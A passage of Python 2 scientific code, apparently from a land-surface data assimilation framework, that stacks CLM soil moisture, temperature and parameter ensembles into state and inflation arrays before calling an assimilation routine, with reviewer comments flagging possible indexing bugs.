# bias containers; these remain empty lists unless bias estimation fills
# them inside CLM_Assim_Common.
parm_infl = []
CLM_Soil_Moisture_parm_infl_Bias = []
CLM_Soil_Temperature_parm_infl_Bias = []
CLM_Surface_Temperature_parm_infl_Bias = []
CLM_Ground_Temperature_parm_infl_Bias = []
CLM_Vegetation_Temperature_parm_infl_Bias = []
Prop_Grid_Array_Sys_parm_infl_Bias = []
Observation_parm_infl_Bias = []
Prop_Grid_Array_Bias = []
Observation_Bias = []
CLM_Soil_Moisture_Ensemble_Bias = []
CLM_Soil_Temperature_Ensemble_Bias = []
CLM_Surface_Temperature_Ensemble_Bias = []
CLM_Ground_Temperature_Ensemble_Bias = []
CLM_Vegetation_Temperature_Ensemble_Bias = []
# State-augmentation branch: taken when NEITHER parameter optimization NOR
# any model/observation bias estimation is enabled. The state vector
# (E0_SysModel/E0_ObsModel) is augmented by vstack-ing extra model variables
# (soil moisture layers, temperatures) below the base state, and parm_infl
# is hstack-ed in the same row order so inflation rows align with state rows.
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
print "------------------ State Definition"
# Flatten the per-member 2-D grids of each augmented variable.
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,:,Ens_Index] = CLM_Soil_Moisture_Ensemble_Mat_SubBlock[Soil_Layer_Index,:, :,Ens_Index].flatten()
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Temperature_Ensemble[Soil_Layer_Index,:,Ens_Index] = CLM_Soil_Temperature_Ensemble_Mat_SubBlock[Soil_Layer_Index,:, :,Ens_Index].flatten()
CLM_Ground_Temperature_Ensemble[:,Ens_Index] = CLM_Ground_Temperature_Ensemble_Mat_SubBlock[:, :,Ens_Index].flatten()
CLM_Vegetation_Temperature_Ensemble[:,Ens_Index] = CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock[:, :,Ens_Index].flatten()
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Soil_Moisture":
if SensorType_Sub == "InSitu":
# For in-situ soil moisture, the layer being assimilated
# (Soil_Layer_Index_DA, apparently 1-based: DA==1 maps to array
# index 0 — TODO confirm) and all shallower layers are stacked
# ABOVE the base state; the remaining layers (down to
# Soil_Layer_Num - 5, i.e. excluding the deepest 5 layers) are
# stacked BELOW it.
if Soil_Layer_Index_DA == 1:
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[0,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
for Soil_Layer_Index in range(2,Soil_Layer_Num - 5,1):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
elif Soil_Layer_Index_DA == 2:
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[1,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[0,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
for Soil_Layer_Index in range(3,Soil_Layer_Num - 5,1):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
elif Soil_Layer_Index_DA == 3:
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[2,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[1,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[0,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
for Soil_Layer_Index in range(4,Soil_Layer_Num - 5,1):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
elif Soil_Layer_Index_DA == 4:
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[3,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[2,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[1,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[0,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
for Soil_Layer_Index in range(5,Soil_Layer_Num - 5,1):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
# Inflation rows follow the same augmentation order as the state.
parm_infl = CLM_Soil_Moisture_parm_infl[0,Mask_Index_Vector]
for Soil_Layer_Index in range(1,Soil_Layer_Num - 5,1):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
# Couple the Soil Temperature to State Vector
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Temperature_Col = CLM_Soil_Temperature_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Temperature_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Temperature_Col))
parm_infl = numpy.hstack((parm_infl,CLM_Vegetation_Temperature_parm_infl[Mask_Index_Vector]))
parm_infl = numpy.hstack((parm_infl,CLM_Ground_Temperature_parm_infl[Mask_Index_Vector]))
for Soil_Layer_Index in range(Soil_Layer_Num):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
else:
# Non-in-situ soil-moisture sensors: simply append layers 0 ..
# Soil_Layer_Num-6 below the base state (no layer reordering).
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
# NOTE(review): parm_infl starts from layer 0 and the loop below also
# begins at layer 0, so layer 0 inflation appears twice — compare with
# the state stacking above; verify this is intended.
parm_infl = CLM_Soil_Moisture_parm_infl[0,Mask_Index_Vector]
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
# Couple the Soil Temperature to State Vector
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Temperature_Col = CLM_Soil_Temperature_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Temperature_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Temperature_Col))
parm_infl = numpy.hstack((parm_infl,CLM_Vegetation_Temperature_parm_infl[Mask_Index_Vector]))
parm_infl = numpy.hstack((parm_infl,CLM_Ground_Temperature_parm_infl[Mask_Index_Vector]))
for Soil_Layer_Index in range(Soil_Layer_Num):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature"):
# Surface-temperature assimilation: augment with vegetation/ground
# temperature and all soil temperature layers.
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Temperature_Col = CLM_Soil_Temperature_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Temperature_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Temperature_Col))
# NOTE(review): this condition is always true inside the enclosing
# elif branch (same test) — kept as-is, but it is redundant.
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
parm_infl = CLM_Surface_Temperature_parm_infl[Mask_Index_Vector]
parm_infl = numpy.hstack((parm_infl,CLM_Vegetation_Temperature_parm_infl[Mask_Index_Vector]))
parm_infl = numpy.hstack((parm_infl,CLM_Ground_Temperature_parm_infl[Mask_Index_Vector]))
for Soil_Layer_Index in range(Soil_Layer_Num):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
# Couple Soil Moisture to State Vector
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
else:
# Parameter-augmentation branch: parameter optimization and/or bias
# estimation is active. Soil and PFT parameter ensembles for the
# sensitive parameters are appended below the state, and parm_infl is
# rebuilt as [variable inflation, parameter inflation...] in the same
# row order.
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r')
print "------------------------- Parameter Definition"
if Soil_Par_Sens_Dim >= 1:
if Def_Print:
print "**********************************************************************Optimize Soil Parameter"
# Only the sensitive soil parameters (Soil_Par_Sens boolean mask) are
# read for the observation box.
Parameter_Space_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:,Soil_Par_Sens, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
Parameter_Col = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
for Ens_Index in range(Ensemble_Number):
Parameter_Col[:,Ens_Index] = Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:].flatten()
#Parameter_Min_Max[Par_Index,0] = numpy.min(Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:])
#Parameter_Min_Max[Par_Index,1] = numpy.max(Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:])
#print numpy.min(Parameter_Col[:,Ens_Index]),numpy.max(Parameter_Col[:,Ens_Index]),numpy.min(E0_ObsModel_SubBlock[:,Ens_Index]),numpy.max(E0_ObsModel_SubBlock[:,Ens_Index])
#Parameter_Col[:,Ens_Index] = imadjust.imadjust(Parameter_Col[:,Ens_Index],numpy.min(Parameter_Col[:,Ens_Index]),numpy.max(Parameter_Col[:,Ens_Index]),numpy.min(E0_ObsModel_SubBlock[:,Ens_Index]),numpy.max(E0_ObsModel_SubBlock[:,Ens_Index]))
Parameter_Col_Temp = Parameter_Col[Mask_Index_Vector,:]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,Parameter_Col_Temp))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,Parameter_Col_Temp))
del Parameter_Col, Parameter_Col_Temp
Par_Index_Sub += 1
parm_infl_Space_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][Soil_Par_Sens, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
# Seed parm_infl with the assimilated variable's inflation.
# NOTE(review): Soil_Layer_Index_DA is used here as a direct array
# index, while the state branch above treats it as 1-based (DA==1 ->
# index 0) — possible off-by-one; verify against the caller.
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Soil_Moisture":
parm_infl = CLM_Soil_Moisture_parm_infl[Soil_Layer_Index_DA,Mask_Index_Vector]
elif Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
parm_infl = CLM_Surface_Temperature_parm_infl[Mask_Index_Vector]
else:
parm_infl = Prop_Grid_Array_Sys_parm_infl[Mask_Index_Vector]
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
parm_infl_Col = parm_infl_Space_SubBlock[Par_Index_Sub,:,:].flatten()
parm_infl = numpy.hstack((parm_infl,parm_infl_Col[Mask_Index_Vector]))
del parm_infl_Col
Par_Index_Sub += 1
del Parameter_Space_SubBlock, parm_infl_Space_SubBlock
if PFT_Par_Sens_Dim >= 1:
if Def_Print:
print "**********************************************************************Optimize PFT Parameter"
#print PFT_Par_Sens,numpy.shape(Parameter_PFT_Space_Ensemble)
Parameter_Space_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,PFT_Par_Sens, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
Parameter_Col = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
for Ens_Index in range(Ensemble_Number):
Parameter_Col[:,Ens_Index] = Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:].flatten()
#Parameter_Min_Max[Par_Index,0] = numpy.min(Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:])
#Parameter_Min_Max[Par_Index,1] = numpy.max(Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:])
#print numpy.min(Parameter_Col[:,Ens_Index]),numpy.max(Parameter_Col[:,Ens_Index]),numpy.min(E0_ObsModel_SubBlock[:,Ens_Index]),numpy.max(E0_ObsModel_SubBlock[:,Ens_Index])
#Parameter_Col[:,Ens_Index] = imadjust.imadjust(Parameter_Col[:,Ens_Index],numpy.min(Parameter_Col[:,Ens_Index]),numpy.max(Parameter_Col[:,Ens_Index]),numpy.min(E0_ObsModel_SubBlock[:,Ens_Index]),numpy.max(E0_ObsModel_SubBlock[:,Ens_Index]))
Parameter_Col_Temp = Parameter_Col[Mask_Index_Vector,:]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,Parameter_Col_Temp))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,Parameter_Col_Temp))
del Parameter_Col, Parameter_Col_Temp
Par_Index_Sub += 1
#print "PFT_Par_Sens",PFT_Par_Sens
parm_infl_Space_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][PFT_Par_Sens, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
#print numpy.shape(parm_infl_Space_SubBlock)
# NOTE(review): "PFT_Moisture" does not match any sensor-variable name
# used elsewhere in this chunk (cf. "Soil_Moisture") — looks like a
# typo, which would make this condition never fire; confirm.
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "PFT_Moisture":
parm_infl = CLM_Soil_Moisture_parm_infl[Soil_Layer_Index_DA,Mask_Index_Vector]
elif Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
parm_infl = CLM_Surface_Temperature_parm_infl[Mask_Index_Vector]
else:
parm_infl = Prop_Grid_Array_Sys_parm_infl[Mask_Index_Vector]
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
parm_infl_Col = parm_infl_Space_SubBlock[Par_Index_Sub,:,:].flatten()
parm_infl = numpy.hstack((parm_infl,parm_infl_Col[Mask_Index_Vector]))
del parm_infl_Col
Par_Index_Sub += 1
del Parameter_Space_SubBlock, parm_infl_Space_SubBlock
NC_File_Out_Assimilation_2_Parameter.close()
#os.abort()
#E0_ObsModel_All = E0_SysModel_All[:,0:Ensemble_Number]
#########################################################################################################################################
# ParFlow-related containers are passed empty (ParFlow coupling not active
# in this path — TODO confirm against CLM_Assim_Common's signature).
PF_PRESSURE_Ensemble_Mat_SubBlock = []
PF_SATURATION_Ensemble_Mat_SubBlock = []
PF_SATURATION_parm_infl_SubBlock = []
if Def_Print:
start = time.time()
print "numpy.size(numpy.where(Observation_Matrix_SubBlock != NAvalue)[0])",numpy.size(numpy.where(Observation_Matrix_SubBlock != NAvalue)[0])
print "numpy.shape(E0_SysModel_SubBlock)[0]",numpy.shape(E0_SysModel_SubBlock)[0]
# Run the filter only if this sub-block has at least one valid observation
# and a non-empty (post-masking) state vector; otherwise fall back to the
# ensemble mean of the propagated state (no update).
if numpy.size(numpy.where(Observation_Matrix_SubBlock != NAvalue)[0]) > 0 and numpy.shape(E0_SysModel_SubBlock)[0] > 0:
if Def_Print:
print "numpy.shape(E0_SysModel_SubBlock),numpy.shape(E0_ObsModel_SubBlock),numpy.shape(parm_infl)",numpy.shape(E0_SysModel_SubBlock),numpy.shape(E0_ObsModel_SubBlock),numpy.shape(parm_infl)
print "numpy.min(E0_SysModel_SubBlock),numpy.min(E0_ObsModel_SubBlock),numpy.min(parm_infl)",numpy.min(E0_SysModel_SubBlock),numpy.min(E0_ObsModel_SubBlock),numpy.min(parm_infl)
print "numpy.max(E0_SysModel_SubBlock),numpy.max(E0_ObsModel_SubBlock),numpy.max(parm_infl)",numpy.max(E0_SysModel_SubBlock),numpy.max(E0_ObsModel_SubBlock),numpy.max(parm_infl)
print "numpy.size(numpy.where(Observation_Matrix[Observation_Matrix_Index,::]!= NAvalue))",numpy.size(numpy.where(Observation_Matrix[Observation_Matrix_Index,::]!= NAvalue)[0])
if Def_Print >= 2:
print "E0_SysModel_SubBlock,E0_ObsModel_SubBlock,parm_infl",E0_SysModel_SubBlock,E0_ObsModel_SubBlock,parm_infl
#-----------------------###################### Call CLM_Assim_Common"
# Single positional mega-call: the assimilation driver returns the
# analysis grids, updated ensembles, inflation fields, bias terms,
# parameter spaces, and innovation/increment diagnostics for this
# sub-block. Argument ORDER is the contract here — do not reorder.
Analysis_Grid_SubBlock, Analysis_Grid_Array_SubBlock, Localization_Map_Mask_SubBlock, \
CLM_Ground_Temperature_Ensemble_Mat_SubBlock, CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock, CLM_Soil_Moisture_Ensemble_Mat_SubBlock, CLM_Soil_Temperature_Ensemble_Mat_SubBlock, PF_PRESSURE_Ensemble_Mat_SubBlock, PF_SATURATION_Ensemble_Mat_SubBlock, \
Prop_Grid_Array_Sys_parm_infl_SubBlock, CLM_Latent_Heat_parm_infl_SubBlock, CLM_Surface_Temperature_parm_infl_SubBlock, CLM_Ground_Temperature_parm_infl_SubBlock,CLM_Vegetation_Temperature_parm_infl_SubBlock, CLM_Soil_Moisture_parm_infl_SubBlock,CLM_Soil_Temperature_parm_infl_SubBlock, PF_SATURATION_parm_infl_SubBlock,\
CLM_Ground_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Vegetation_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Moisture_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Temperature_Ensemble_Mat_Bias_SubBlock, \
CLM_Surface_Temperature_parm_infl_Bias_SubBlock, CLM_Ground_Temperature_parm_infl_Bias_SubBlock,CLM_Vegetation_Temperature_parm_infl_Bias_SubBlock, CLM_Soil_Moisture_parm_infl_Bias_SubBlock,CLM_Soil_Temperature_parm_infl_Bias_SubBlock, \
Prop_Grid_Array_Bias_SubBlock, Observation_Bias_SubBlock, Prop_Grid_Array_Sys_parm_infl_Bias_SubBlock, Observation_parm_infl_Bias_SubBlock, \
Parameter_Soil_Space_Ensemble_SubBlock, Parameter_Soil_Space_parm_infl_SubBlock, Parameter_Veg_Space_Ensemble_SubBlock, Parameter_Veg_Space_parm_infl_SubBlock, Parameter_PFT_Space_Ensemble_SubBlock, Parameter_PFT_Space_parm_infl_SubBlock, \
Parameter_Hard_Space_Ensemble_SubBlock, Parameter_Hard_Space_parm_infl_SubBlock, Innovation_State_SubBlock, Increments_State_SubBlock = \
CLM_Assim_Common(Block_Index, Model_Driver, Def_PP, Def_First_Run, Def_Print, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs, eps, msw_infl, parm_infl, Post_Inflation_Alpha, Def_ParFor, Observation_NLats_SubBlock, Observation_NLons_SubBlock, Ensemble_Number, Ensemble_Number_Predict,
Call_Gstat_Flag, Assim_Algorithm_Name, Model_State_SubBlock, E0_SysModel_SubBlock, E0_ObsModel_SubBlock, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, X_Left_SubBlock, X_Right_SubBlock, Y_Lower_SubBlock, Y_Upper_SubBlock, Proj_String, Z_Resolution,
Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper, Variable_List,
Grid_Resolution_CEA, Prop_Grid_Array_SubBlock, Prop_Grid_Array_H_Trans_SubBlock, Model_Variance_SubBlock, Write_DA_File_Flag, Mask_SubBlock, Mask_Index_SubBlock, Land_Mask_Data_SubBlock, Observation_Variance_SubBlock, SensorQuantity_Sub, SensorQuantity_Index,
Observation_NLats_SubBlock, Observation_NLons_SubBlock, Observation_Longitude_SubBlock, Observation_Latitude_SubBlock, Observation_Matrix_SubBlock, DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, Soil_Layer_Index_DA, Soil_Layer_Num, ParFlow_Layer_Num, omp_get_num_procs_ParFor,
Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type, NSLOTS, DAS_Output_Path, Region_Name,
Variable_Assimilation_Flag, Teta_Residual_SubBlock, Teta_Saturated_SubBlock, Teta_Field_Capacity_SubBlock, Teta_Wilting_Point_SubBlock, SensorType_Sub, SensorVariable_Sub, SensorResolution_Sub, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial,
Observation_Corelation_Par[Observation_Matrix_Index,::], Bias_Estimation_Option_Model, Bias_Estimation_Option_Obs, Low_Ratio_Par, High_Ratio_Par,
Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
CLM_Ground_Temperature_Ensemble_Mat_SubBlock,CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock, CLM_Soil_Moisture_Ensemble_Mat_SubBlock,CLM_Soil_Temperature_Ensemble_Mat_SubBlock, PF_PRESSURE_Ensemble_Mat_SubBlock, PF_SATURATION_Ensemble_Mat_SubBlock,
Prop_Grid_Array_Sys_parm_infl_SubBlock, [], CLM_Surface_Temperature_parm_infl_SubBlock, CLM_Ground_Temperature_parm_infl_SubBlock,CLM_Vegetation_Temperature_parm_infl_SubBlock, CLM_Soil_Moisture_parm_infl_SubBlock,CLM_Soil_Temperature_parm_infl_SubBlock, PF_SATURATION_parm_infl_SubBlock,
CLM_Ground_Temperature_Ensemble_Mat_Bias_SubBlock,CLM_Vegetation_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Moisture_Ensemble_Mat_Bias_SubBlock,CLM_Soil_Temperature_Ensemble_Mat_Bias_SubBlock,
CLM_Surface_Temperature_parm_infl_Bias_SubBlock, CLM_Ground_Temperature_parm_infl_Bias_SubBlock,CLM_Vegetation_Temperature_parm_infl_Bias_SubBlock, CLM_Soil_Moisture_parm_infl_Bias_SubBlock,CLM_Soil_Temperature_parm_infl_Bias_SubBlock,
Prop_Grid_Array_Bias_SubBlock, Observation_Bias_SubBlock, Prop_Grid_Array_Sys_parm_infl_Bias_SubBlock, Observation_parm_infl_Bias_SubBlock, Def_CDF_Matching, Plot_Analysis, Parameter_Optimization_Flag,
